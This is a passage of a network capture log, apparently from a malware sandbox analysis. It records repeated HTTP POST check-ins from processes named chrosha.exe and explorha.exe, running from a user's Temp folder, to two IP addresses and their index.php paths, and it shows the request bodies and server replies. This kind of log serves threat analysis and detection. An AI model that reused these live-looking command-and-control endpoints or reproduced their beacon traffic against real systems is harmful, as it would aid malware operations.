                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:07.294547081 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1120192.168.2.550974193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:07.505484104 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:07.759339094 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1121192.168.2.550975193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:07.649529934 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:07.897568941 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1122192.168.2.550976193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:08.125196934 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:08.372778893 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1123192.168.2.550977193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:08.152297974 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:08.403275013 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1124192.168.2.550978193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:08.626852036 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:08.875752926 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1125192.168.2.550979193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:08.762506962 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:09.009022951 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1126192.168.2.550980193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:09.233042955 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:09.473926067 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1127192.168.2.550981193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:09.267402887 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:09.524271011 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1128192.168.2.550982193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:09.725752115 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:09.976305008 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1129192.168.2.550983193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:09.880737066 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:10.124952078 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1130192.168.2.550984193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:10.342417002 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:10.593863010 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1131192.168.2.550985193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:10.367902040 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:10.612126112 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1132192.168.2.550986193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:10.849131107 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:11.102238894 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1133192.168.2.550987193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:10.966979980 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:11.214252949 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1134192.168.2.550988193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:11.465202093 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:11.713751078 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1135192.168.2.550989193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:11.465207100 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:11.714739084 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
